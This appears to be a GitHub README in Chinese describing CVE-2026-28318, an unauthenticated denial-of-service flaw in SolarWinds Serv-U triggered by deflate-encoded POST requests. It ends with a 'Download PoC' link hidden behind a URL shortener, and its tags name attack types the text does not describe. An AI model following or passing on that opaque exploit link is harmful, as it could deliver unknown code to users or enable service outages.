jenniferreire26/CVE-2026-28318

# 安全漏洞 (CVE-2026-28318) ## 概述 已确认存在一个高危漏洞，编号为 CVE-2026-28318，归类于 CWE-400（CVSS 7.5）。SolarWinds Serv-U 容易受到特制 POST 请求的影响，攻击者可使用 Content-Encoding: deflate 在无需身份验证的情况下导致 Serv-U 服务崩溃。如果您无法部署更新，SolarWinds Trust Center 中提供了相关的缓解步骤以保护客户环境的安全。 ## 详情 - **CVE ID**: [CVE-2026-28318](https://nvd.nist.gov/vuln/detail/CVE-2026-28318) - **发现日期**: 2026-06-04 - **发布日期**: 2026-06-04 - **严重程度**: HIGH - **CVSS**: 7.5 - **影响**: 可用性 ## 漏洞描述 SolarWinds Serv-U 容易受到特制 POST 请求的影响，攻击者可使用 Content-Encoding: deflate 在无需身份验证的情况下导致 Serv-U 服务崩溃。如果您无法部署更新，SolarWinds Trust Center 中提供了相关的缓解步骤以保护客户环境的安全。 ## 受影响版本 **Solarwinds Serv-U:** - 15.5.4 之前版本 - 15.5.4 ## Exploit [下载 PoC](https://tinyurl.com/23hwxj2a)

标签：CWE-400, PoC, SolarWinds Serv-U, 拒绝服务攻击, 暴力破解, 配置错误